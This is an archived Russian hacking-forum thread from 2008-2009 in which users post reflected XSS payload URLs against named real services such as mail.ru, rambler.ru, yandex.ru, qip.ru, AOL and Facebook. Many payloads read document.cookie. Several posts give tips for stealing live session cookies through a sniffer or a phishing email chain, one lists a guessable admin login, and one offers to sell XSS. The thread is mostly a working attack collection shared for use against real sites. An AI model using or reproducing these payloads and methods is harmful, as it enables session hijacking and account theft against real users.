PDA

Просмотр полной версии : Пассивные xss на почтовых серверах


Constantine
25.10.2008, 15:54
Выкладываем только пассивные xss на почтовых серверах (для активных xss существует отдельная тема)

Оффтоп наказуем

p\s Невозбраняется выложить рабочии xss из аналогичной темы (в разделе Уязвимости), что канула в лету

TreV@N
26.10.2008, 11:32
rambler.ru

http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert%20('XSS')%3C/script%3E

cash$$$
26.10.2008, 21:55
http://top100.rambler.ru/cgi-bin/reg...p=0&reg=accept

Во всех полях вставляем "><script>alert('xss')</script>

http://goon.ru/i/phone/rus_moscow.htm

В поле Поиск по фамилии "><script>alert('xss')</script>

http://catalog.aport.ru/rus/add/AddUrl.aspx

В Адрес ресурса вставляем "><script>alert('xss')</script>

TreV@N
27.10.2008, 06:26
Ramber.ru

http://ds.rambler.ru/index.php?p=news&pubId=1365&pubMode="><script>alert(/TreV@N/)</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5"><script>alert('TreV@N')</script>&form=0&hu=1&what=0

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0&hu=1&what=0"><script>alert('TreV@N')</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0"><script>alert('TreV@N')</script>&hu=1&what=0

S0ulVortex
15.11.2008, 22:41
Решил выложить XSS найденную лично мной
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

foopi
20.11.2008, 00:23
пара уязвимостей на qip:
http://pochta.qip.ru/mailbox/find/?actionID=1&search=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://file.qip.ru/preview.jsp?w=200'&h=200'&s=no&b=yes&l=http://slipknot1.ru%22%3E%3C/iframe%3E%3Cscript%3Ealert()%3C/script%3E

.dimoN.
20.11.2008, 01:22
Решил выложить XSS найденную лично мной
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
по твоему же примеру
http://nova.rambler.ru/srch?query=%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS %27)%3C%2Fscript%3E

cash$$$
22.11.2008, 02:28
http://inbox.uz/
'><script>alert(/xss/)</script>
Уязвимые поля Логин и пароль.

Ded MustD!e
23.11.2008, 20:45
http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>
http://rasp.yandex.ru/info/996500"><script>alert('XSS')</script>
http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script>
http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cookie)</script>
http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.cookie)</script>
http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>
http://www.pisem.net/download.php/?file="><script>alert('XSS')</script>
http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>
http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

Luccifer
25.11.2008, 16:57
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert('Luccifer')</script>

http://top100.rambler.ru/cgi-bin/register.cgi?group=49&reg=accept
в поле URL Вашей страницы:
Код:
"><script>alert(document.cookie)</script

Luccifer
25.11.2008, 16:59
Mail.сру
http://content.mail.ru/search?q=%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E

http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1=phrase=&proto=1&url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3 C%2Fscript%3E&title=&descr=&owner=&cperson=&email=&phone=&fax=&address=&keywords=&session_id=16073130&category_id=10993&category_name=%CC%E5%E4%E8%F6%E8%ED%E0+%E8+%E7%E4% EE%F0%EE%E2%FC%E5&page=1&save=1

http://hosting.mail.ru/lc.jsp?loginput=&login=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fscr ipt%3E&password=


http://infobox.ru/index.php?=action=go&domain=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fsc ript%3E&tld=ru&x=21&y=4


http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470


http://hosting.mail.ru/
в поле логин вводим
Код:
"><script>alert('xss')</script>

ImpLex
14.12.2008, 17:56
http://ds.rambler.ru/index.php?p=news&pubId=00000000000000000000000000000000000000000000 0003&pubMode=%3Cscript%3Ealert()%3C/script%3E
Была активная XSS, но топик для пассивных.

S0ulVortex
19.12.2008, 22:20
Ну опять хсс убитого рамблера на котором даже те что есть не фиксят.
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?btnG=%CD%E0%E9%F2%E8%21&words=(XSS)=5&form=0&hu=1&what=0

</title><script>alert('S0ulVortex')</script>

Jazz
26.12.2008, 11:24
http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470

уже не работают?или я не то делаю?

faza02
26.12.2008, 11:31
не работают.
http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%3Cscript%3Ealert('xss%20by%20 f02')%3C/script%3E
эта работает.

The matrix
31.12.2008, 21:21
Хз. Может кто и находил. Просто рамблер совсем не фиксит XSS. Иметь там почтовый ящик не знающим просто опасно
http://miss.rambler.ru/srch/?sort=0&set=miss&words=%22%3E%3Cscript%3Ealert(/hacker?/)%3C/script%3E

iddqd
04.01.2009, 15:37
Gala.net
http://forum.gala.net/?ff=1012&page=search&q=%22%2F%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=and

iddqd
04.01.2009, 18:14
ВШтате
http://vshtate.ru/reg?op=message&email=[XSS]
Но если авторизован, то не пашет :(
Короче, бесполезная :(
В профиле при добавлении инфы во многие поля срабатывает код, но сохраняется в отфильтрованом виде.
Непохек :(

baltazar
05.01.2009, 16:05
Facebook.com




http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3 C/script%3E%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E


только толку от нее нету:(

lmns
10.01.2009, 22:33
http://yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert("XSS%20from%20lmns")</script>

iddqd
12.01.2009, 18:52
Мой Круг [Яндекс]

http://moikrug.ru/mates/search/all/russia/?search="/>XSS

iddqd
13.01.2009, 13:36
m@il.com

http://mail01.mail.com/scripts/help/help.cgi?type=search&lang=us&string=XSS

iddqd
13.01.2009, 23:22
МИРТЕСЕН

http://mirtesen.ru/groups/map#search&<script>alert(document.cookie)</script>

Прошу модераторов простить меня за то, что я отхожу от тематики почтовых серверов- но думаю, социальные сети можно приравнять к ним по важности.

iddqd
15.01.2009, 13:45
Снова i.ua - на этот раз пассивка ;)

http://events.i.ua/search/?words=</title>XSS&type=text

TreV@N
16.01.2009, 19:24
http://mail.kinozal.tv/

http://kinozal.tv/login.php?returnto={XSS}

TreV@N
16.01.2009, 19:31
http://webmail.rin.ru/

http://search.rin.ru/?text={XSS}

Zikko
23.01.2009, 20:37
на сайте http://www.mylivepage.ru в поле для поиска
"><script>alert('xss')</script>

Dimi4
27.01.2009, 22:49
META.UA (Поисковик, почта...)
http://meta.ua/ua/?rgn=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&ur

Ну и так, в придачу rutube.ru :D + раскрытие путей

http://ru tube.ru/channels.html?dir=asc&order_by=alias%22%3E%3Cimg%20src=javascript:alert( document.cookie)%3E
/var/virtual/rutube.ru/lib/Rutube/Obj/Channel.pm line 658

Sin3v
31.01.2009, 23:20
Mail.ru
http://hosting.mail.ru/lc.jsp?loginput=&login=123&password=%22%3E%3Cscript%3Ealert(%27Sin3v%27)%3C/script%3E

TreV@N
04.02.2009, 07:20
e-mail.ru

http://www.e-mail.ru/webmail.ok?cmd=calendar&month={xss}

Найдена лично мной

Sin3v
06.02.2009, 15:02
e-mail.ru

http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert(%27Sin3v %27)%3C/script%3E

А это лично мной)

MaDfUn
17.02.2009, 19:41
Работает в IE
http://sysadmin.mail.ru/pforum/profile.php?mode=viewprofile&u="><script>alert(/xss/)</script>

iddqd
18.02.2009, 14:29
A.UA - унылый веб2.0 сервис (бета)
http://web20.a.ua/searchresults?query=[XSS]&stype=all
http://web20.a.ua/slovo?query=[XSS]&stype=word
http://web20.a.ua/radio?query="/>[XSS]&stype=radio

и так далее

Sleep
03.03.2009, 13:55
http://horoscopes.rambler.ru/astrosystems.html?sid=47670&sign=203672&sec=2036571"><script>alert(document.cookie)</script>

тестил в Опере

Dr.Frank
11.03.2009, 22:39
http://news.mail.ru/politics/2416467'%20onmouseover='javascript:alert(document. cookie)';a='/useit/

Для реализации надо навести мышкой на поле ввода

Shaitan-Devil
12.03.2009, 09:38
yandex

http://old-kubok.yandex.ru/cgi/cert.pl?s=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

xcedz
27.03.2009, 00:13
http://go.mail.ru/frame.html?imgurl=xss

иддкд
05.04.2009, 02:22
http://gallery.icq.com/browse.php?search=search&term=%3Cscript%3Ealert(document.cookie)%3C/script%3E

xcedz
09.04.2009, 02:46
http://paint.kards.qip.ru/compose/edit/2292/?card_id=xss

2fed
09.05.2009, 00:32
phpinfo
http://fo2.rambler.ru/info.php phpinfo

хсс
http://help.rambler.ru/feedback.html?s=7715&fio=%22%3E%3Cscript%3Ealert(/2fed/)%3C/script%3E

админка
http://in.fo2.rambler.ru/administrator/index.php?

и ещё
http://ad.rambler.ru/
CLIENTS LOGIN

логин=test
пасс=test

wildshaman
10.05.2009, 18:43
Пассивка на mail.ru, работает онли в хроме:

http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,501,20,9&element=1&code="><script>alert(document.cookie)</script>

FatalLerr0r
21.05.2009, 20:45
Пассивка на qip.ru
http://video.qip.ru/broadcast/view/?id=2172438&from="><script>alert('XSS by FatalLerr0r')</script>

Sin3v
26.07.2009, 07:38
Mail.ru
Работает через пост запрос в поле E-Mail
http://device.mail.ru/published/forgot.php

edge911
31.07.2009, 19:00
на yandex.ru создаем новое событие в календаре,
назваагние пишем любое , в описание <img src = http://artfile.ru/funfoto/b/v/1939_26_186_ArtFile_ru.jpg onload = alert(123);>
при просмотре события вылазит алерт"123"
p.s сори еси не туда написал )

Sleep
17.08.2009, 01:02
http://g1.botva.mail.ru/registration.php?race=1<'><script>alert(document.cookie)</script>

JOHNik
20.08.2009, 00:41
http://translate.google.com/translate?hl=ru&sl=en&tl=ru&u=http%3A%2F%2Fforums.xmbforum.com%2Ffiles.php%3Fp id%3D1361320%26aid%3D20274
http://translate.google.co.uk/translate?hl=ru&sl=en&tl=ru&u=http%3A%2F%2Fforums.xmbforum.com%2Ffiles.php%3Fp id%3D1361320%26aid%3D20274
То же самое и тут (PREF TM LM S)
такая же трабла и с AOL например:
http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script>
просто это не те которые нужны. :( но идея с переводом документа хорошая

satana-fu
25.08.2009, 19:38
http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script>
просто это не те которые нужны. :( но идея с переводом документа хорошая

там же, куча пассивок, вывешивать не стал чтоб не флудить, но xss на каждом шагу, щя поищу активку

https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cac%3aWS%7cat%3 aSNS%7cld%3awebmail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aAOL%7csnt%3aScreenName&offerId=mail-second-en-us&seamless=%22%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E

satana-fu
30.08.2009, 07:09
пассивная XSS на рамблер, только что нашел

http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&uid=4513&page=200&num=5&end=080911&type=16&start=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E0&iid=27203

http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&page=206&uid=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E3&end=080911&type=16&iid=27203&start=080910

Правда в этой строке их до фига и больше...

xss-faq
01.09.2009, 17:25
xss mail.ru
http://wifi.mail.ru/comments.html?point_id=6568&thread="><script>alert(document.cookie)</script>
xss yandex.ru
http://images.yandex.ru/cgi-bin/customize.pl?retpath=http://yandex.ru/yandsearch?text="><script>alert(document.cookie)</script>
Сам искал! :p

vitaliy_n73
09.09.2009, 00:01
Вот пару месяцев назад нашел,думал буду пользоватся,ща как-то не пригодилось так чтоб зря не пропадала берите пользуйтесь на здоровье!


http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ealert()%3C/script%3E

Travakur555
15.09.2009, 21:21
http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert(%27Sin3v %27)%3C/script%3E

Sin3v
16.09.2009, 14:42
Mail.ru
http://kv.mail.ru/game/create_character.php?name=%22%3E%3Cscript%3Ealert% 28document.cookie%29%3C/script%3E

Работает у авторизованных.

Ruslan1817
21.09.2009, 21:48
за что вы мои XSS удаляете ?

Я их сам находил...

http://www.netman.ru/contacts.phtml в поле имя и фамилия вводим
<'<"><script>alert('XSS')</script><

Ruslan1817
23.09.2009, 13:02
http://horoscopes.rambler.ru/astrosystems.html?sid=47670&sign=203672&sec=203657 1"><script>alert(document.cookie)</script>

satana-fu
24.09.2009, 15:39
пассивка на рамблере

http://id-planet.rambler.ru/main/user/blacklist
строка Найти забаненного
<img src=foo.png onerror=alert(document.cookie) />


еще одна пассивка на рамблер

http://autorambler.ru/cars/by-price/?price_from=%27%3E%3Cscript%3Ealert%28document.coo kie%29%3C%2Fscript%3E&raz=1&price_to=250000&model=303&skip=0&currency=RUR

Ruslan1817
24.09.2009, 16:57
http://torg.mail.ru/844/res/?&"><script>alert(document.cookie)</script>[sort]=2

Ruslan1817
24.09.2009, 17:03
http://torg.mail.ru/835/138479/?%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Etab_id=2

satana-fu
24.09.2009, 17:09
первый раз сам нашел... на майле... правда с подсказкой :-)
это тоже твой xss, нашел уже с твоей подсказкой

http://torg.mail.ru/109/res/?"><script>alert(document.cookie)</script>[vendor_id][]=49

Ruslan1817
24.09.2009, 17:30
https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1"><script>alert('Sin3v')</script>
от Sinva

подправил
https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1%3Cimg%20src=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

satana-fu
27.09.2009, 04:37
все пассивки прикрыли... как так 0_0

а ты развивай ту. которую начал)))), вот тебе еще пассивка на майл

http://torg.mail.ru/844/res/?%27p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C%2Fscript%3E

улови какая разница между вышестоящим и этим урл ниже

http://torg.mail.ru/844/res/?p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28docu ment.cookie%29%3C%2Fscript%3E

как только догонишь, найдешь кучу пассивных xss на майле ;) не забудь убрать пробелы

Ruslan1817
28.09.2009, 06:16
мэил.ру

http://torg.mail.ru/2121/?'path_id=1229%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://torg.mail.ru/109/310670/?'tab_id=2%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

darkwkz
28.09.2009, 13:41
one.lv
http://c3.one.lv/welcome?language=ru%22%3E%3Cscript%3Ealert%28docum ent.cookie%29%3C/script%3E

Details
29.09.2009, 17:03
http://www.pochta.ru/games/?ids=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E :cool:

Details
29.09.2009, 17:39
мэил.ру

http://torg.mail.ru/2121/?'path_id=1229%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://torg.mail.ru/109/310670/?'tab_id=2%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

Уже прикрыли)) :D

Ruslan1817
30.09.2009, 11:00
http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(document.cookie)</script>

Тока не орем))
Тут мне прислали письмо с QUELLE ( заказывал себе хрень одну ) при вводе скрипта в адресную строку я получил свои куки, но на других эта XSS не работает т.к. соответственно письмицо у них отсутствует :( ... есть какие небудь предложения по этому поводу ? Если надо выложу скрин.

darkwkz
30.09.2009, 22:52
inbox.lv забугорный сайтец.
http://help.inbox.lv/?language=%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Ruslan1817
05.10.2009, 20:19
http://story.travel.mail.ru/?<'<"><script>alert('Ruslan1817')</script><mod=story&country_id=44

http://story.travel.mail.ru/?%3C'%3C%22%3E%3Cscript%3Ealert('Ruslan1817')%3C/script%3E%3Cmod=story&country_id=44

Travakur555
06.10.2009, 04:39
http://story.travel.mail.ru/?<'<"><script>alert('Ruslan1817')</script><mod=story&country_id=44

http://story.travel.mail.ru/?%3C'%3C%22%3E%3Cscript%3Ealert('Ruslan1817')%3C/script%3E%3Cmod=story&country_id=44
Чтот не рабочии твои хсс :D

darkwkz
06.10.2009, 16:41
http://c3.one.lv/welcome?language=ru%22%3E%3Cscript%3Ealert%28docum ent.cookie%29%3C/script%3E сообщил администрации, в общем можно сказать получил 120 $ ))

darkwkz
06.10.2009, 16:54
Хxsка на сайте Латвийского оператора, я им сообщил птм они мне звонили и в общем уже 3 дня прошло а залатать не могут.В общем там тоже можно считать как эмайл...
http://zeltazivtina.lv/ru/search?q=%22%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E
Там в поиске еще активка есть)

Ruslan1817
07.10.2009, 20:37
http://story.travel.mail.ru/?mod%3C'%3C%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C=story&city_id=183615

satana-fu
12.10.2009, 18:30
XSS на юкозe (работает только у авторизованных админов сайта)

http://сайт на юкозе.ru/tmpls/?a=fm;n="><script>alert(document.cookie)</script>;ffilter=video;f=auth?ljcUik


Не почтовый сервер, просто не нашел куда засунуть его :rolleyes:

Gefasto
16.10.2009, 11:15
Пассивная xss на ngs.ru
http://expert.ngs.ru/search/?q=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28doc ument.cookie%29%3C%2Fscript%3E&t=1&r=0

Ruslan1817
18.10.2009, 23:25
http://travel.mail.ru/news/46607/?%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3E&page=1

думал уже все прикрыли =))

Ruslan1817
19.10.2009, 23:43
http://content.mail.ru/help/&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3E
Так же продам пассивки XSS

mailbrush
21.10.2009, 22:16
http://www.google.com.ua/imgres?imgurl=http://gogole.com&imgrefurl=IFRAME_HERE&h=254&w=340&sz=15D0%25B8%25D1%2582%25D0%25B1%25D1%2583%25D0%25 BB%25D1%258C%25D1%2582%25D0%25B5%25D1%2580%25D1%25 8C%25D0%25B5%25D1%2580&hl=ru&usg=__UzxB7H_92zpHrCDSG-bR5itVNg4=&ei=Lk7fSvurCI-lsAbN0_GlDg&sa=X&oi=image_result&resnum=4&ct=image&ved=0CAwQ9QEwAwIFRAME

Irdis
22.10.2009, 17:07
http://calendar.yandex.ru/event-add?show_date=2009-10-22&view_type=%22%27%3E%3Cscript%3Ealert%28%27Irdis%27 %29%3C/script%3E

satana-fu
23.10.2009, 16:51
пассивки на рамблер

http://id-planet.rambler.ru/default/friends/search/?do_friends_search=1&firstname=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Dale rt%28%2F%D0%98%D0%BC%D1%8F%2F%29+%2F%3E+&lastname=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Daler t%28%2F%D0%A4%D0%B0%D0%BC%D0%B8%D0%BB%D0%B8%D1%8F% 2F%29+%2F%3E+&external_id=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Da lert%28%2F%D0%9B%D0%BE%D0%B3%D0%B8%D0%BD%2F%29+%2F %3E+&service_id=

Работает только у авторизованных (пробелы убрать)

Ruslan1817
23.10.2009, 17:40
http://travel.mail.ru/?'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Ecity_from=1&countryid=1934&countryidtxt=& cityid=1500&cityidtxt=&hotelidtxt=&inp_mode=sel&ca t4=on&cat5=on&price=%3Cimg+src%3D%22javascript%3Aa lert%28document.cookie%29%22%3E&p_mode=1&p_type=2& nights1=%3Cimg+src%3D%22javascript%3Aalert%28docum ent.cookie%29%22%3E&nights2=%3Cimg+src%3D%22javasc ript%3Aalert%28document.cookie%29%22%3E&date1_d=1& date1_my=10_2009&date2_d=22&date2_my=11_2009&HB=on &STD=on&comments=%3Cimg+src%3D%22javascript%3Aaler t%28document.cookie%29%22%3E&mod=custom_order_tour

zpurgenz
25.10.2009, 17:00
http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(document.cookie)</script>

По поводу этой штуки работает многоходовка, да и работает ли...?
Отсылаем мыло. В мыле img на вашем сайте, который запустит скажем php скрипт который узнает рефер (id письма) и вышлет еще одно письмо. С ссылкой XSS на первое письмо....
Даже если первое письмо удалят, оно валяется в удаленных и все равно сработает, т.к. второе письмо прилетит как только откроют перовое... НО надо ведь, что бы первое письмо открыли, а во втором письме прошли по ссылке :) конечно если разослать миллиону товарищей то возможно эффект будет... :)

ЗЫ Совсем забыла, XSS работает если в письме есть вложение.

satana-fu
26.10.2009, 17:58
пассивная xss на qip.ru


работает только у авторизованных
http://file.qip.ru/account/myAccount.jsp?sId="><script>alert(document.cookie)</script>

http://file.qip.ru/account/settings.jsp?sId="><script>alert(document.cookie)</script>

Ruslan1817
28.10.2009, 18:17
http://www.yandex.ru/?add=3188&'><''>"><script>alert(/XSS/)</script>edit=1#widgetAdded

после выберам " Авто
рассчитай стоимость "

и вылазеет XSS !
Знаю что хрень но все же...

satana-fu
29.10.2009, 04:45
пассивка на mаil.ru, работает только у авторизованных

http://hosting.mail.ru/options.jsp?email="><script>alert(document.cookie)</script>



пассивка на mаil.ru, точку в адресе сниффера ставить в урл уникоде, иначе фильтр может заменить точку в урл на нижнее подчеркивание


http://story.travel.mail.ru/?"><script>alert(/xss/)</script>metro_id=4&mod=custom_order_tour&city_from=1&countryid=51
&countryidtxt=&cityid=-1&cityidtxt=&hotelidtxt=&inp_mode=sel&cat3=on
&cat4=on&cat5=on&price=3000&p_mode=1&p_type=2
&nights1=7&nights2=14&date1_d=1&date1_my=10_2009&
date2_d=19&date2_my=10_2009&HB=on&STD=on&comments=

Ruslan1817
29.10.2009, 21:43
http://berserk.mail.ru/index.php?'%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Eid=239

_Spamer_
31.10.2009, 20:25
mail.ru
имя: '"/><script>alert("xss");</script>
© хз:)

Ruslan1817
03.11.2009, 18:14
http://11x11.mail.ru/xml/main/register.php?type=main/register&act=insert в логин вводим '><''>"><script>alert(/Ruslan1817/)</script>

http://11x11.mail.ru/xml/main/send.php?type=main/register&act=sendagain

тоже самое вводим )

Ctacok
05.11.2009, 10:52
http://email.int.ru/cod/site.php?url=http://mail.live.com&title="><script>alert();</script>

Ruslan1817
05.11.2009, 16:59
http://tv.ukr.net/rew/g/07112009/bid141/id19229/tmnow/#index.html в поле

http://kino.ukr.net/cinema/kiev/batterfljaj-de-luxe/2#board

Имя*:
E-mail:
Сообщение*: '><''>"><script>alert(document.cookie)</script>


печенюГа))

исправил на латынь !!!

http://pic.ipicture.ru/uploads/091105/ZYDf5AX74W.jpg
____________________________________________

тут есть дырка фильтре, но никак не могу доработать скрипт :( Кто поможет ?
http://job.ukr.net/resume/?AdvancedSearch=0&ShowSearchResults=1&Keywords=%&RegionId=0

satana-fu
06.11.2009, 16:36
тут есть дырка фильтре, но никак не могу доработать скрипт :( Кто поможет ?
http://job.ukr.net/resume/?AdvancedSearch=0&ShowSearchResults=1&Keywords=%&RegionId=0

такой вариант годится?

http://job.ukr.net/personal/resume/new/?event=Add&Photo%5Bthmb%5D=&Photo%5Bfull%5D="><img src=foo.png onerror=alert(document.cookie) />&RegionId=0&AgreementConfirm=1

Ruslan1817
07.11.2009, 12:45
http://shop.deti.mail.ru/series/13993/?order=name&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3Eway=forward
есть контакт )

далее идем -->шаг 1 --> выбераем подарок--> шаг 2--> везде указываем '><''>"><script>alert(document.cookie)</script> --> шаг 3 -->
Курьер : С.-Петербург --> везде указываем '><''>"><script>alert(document.cookie)</script> --> шаг 4 --> наличными --> жмакаем далее и уау! :)

Все !

Ruslan1817
07.11.2009, 16:25
http://berserk.mail.ru/index.php?'%3E%3Cscript%3Ealert(/XSS/)%3C/script%3Eid=239

http://berserk.mail.ru/berserk49.html?'%3E%3Cscript%3Ealert(/document.cookie/)%3C/script%3E
=))

Ruslan1817
08.11.2009, 12:04
http://soft.mail.ru/s_result_softclub.php?qs=1&words=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28 %2FXSS%2F%29%3C%2Fscript%3E

в фильтре есть дырка ... кто сможет реадизовать ?

Ruslan1817
08.11.2009, 19:19
http://story.travel.mail.ru/?city_from=1&countryid=1934&countryidtxt=%C0%E1%F5%E0%E7%E8%FF&cityid=1500&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3Ecityidtxt=%C3%E0%E3%F0%FB&hotelidtxt=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Eale rt%28%2FXSS%2F%29%3C%2Fscript%3E&inp_mode=inp&price=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28 %2FXSS%2F%29%3C%2Fscript%3E&p_mode=1&p_type=1&nights1=0&nights2=0&date1_d=1&date1_my=11_2009&date2_d=8&date2_my=12_2009&comments=&mod=custom_order_tour



http://travel.mail.ru/?mod=companions&res=1&self_id=1&look_for_id=2&age_from=&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3Eage_to=&account_region_id=0&geo_id=0&days_cnt_id=0&date1=08.11.2009&date2=08.12.2009

Ruslan1817
11.11.2009, 12:11
заходим сюды ---> http://travel.mail.ru/ слева вводим в поля " Город " , " Дата приезда - Дата отъезда " '><''>"><script>alert(document.cookie)</script> ---> найти отель !
WTF? печеькО )))

Ruslan1817
11.11.2009, 20:15
http://content.mail.ru/cgi-bin/list.cgi в поле организация вставить '><''>"><script>alert(document.cookie)</script> и тут полетит печеняГа))

Ruslan1817
20.11.2009, 01:24
Все XSS тока для авторизированных!!! ( на майле 11 x 11 тока при получении письма )

http://vkrugudruzei.ru/user/advert/advert.asp?uid=7155524&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28docume nt.cookie%29%3C/script%3E

http://11x11.mail.ru/xml/office/mail.php?id=18&type=office/mail&act=message&mode=1'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

Кому надо еще XSS от вкругу друзей? стучим ногами в личку!


BlackSun -- тока умеешь -минусы ставить ? достал уже!

Ruslan1817
22.11.2009, 22:18
Заходим сюда ---> http://travel.mail.ru ---> выбераем вклаку взять собой ( МТС ) ---> добавить ( ставим галку ) ----> <IMG SRC="javascript:alert( document.cookie );">
0_o ... WTF?
Как было тяжко без ачата :)

Ruslan1817
23.11.2009, 09:48
http://11x11.mail.ru/?&url='%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&do=logout
работает тока у авторизированных !

satana-fu
23.11.2009, 10:17
http://11x11.mail.ru/?&url='%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&do=logout
работает тока у авторизированных !


так гораздо лучше
http://11x11.mail.ru/?&url="><script>alert(document.cookie)</script>

запрос do=logout в ссылке означает выход из почтового ящика, а мы знаем, что кукисы умирают, как только нажмешь Выход, поэтому последние строки do=logout из ссылки убери, иначе сохранять будешь мертвые кукисы....

Ruslan1817
26.11.2009, 16:38
Не знал куда можно скинуть...

http://nigma.ru/index.php?s='><''>"><script>alert(document.cookie)</script>

Ruslan1817
02.12.2009, 18:19
http://search.icq.com/search/img_results.php?q=%27%3E%3C%27%27%3E%22%3E%3Cscrip t%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&ch_id=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E

Ruslan1817
02.12.2009, 23:28
Продолжаем :)

Заходим сюды ---> Зарегистрироваться и разместить рекламу ----> вводим любые данные ----> выбераем что будем продавать ----> уязвимое поле " нофелет "
'><script>alert(/XSS/)</script>

Root-access
03.12.2009, 17:36
Yandex XSS: http://mail.yandex.ru/classic/abook_person?ids=1\');'>');}</script><script>alert()</script>

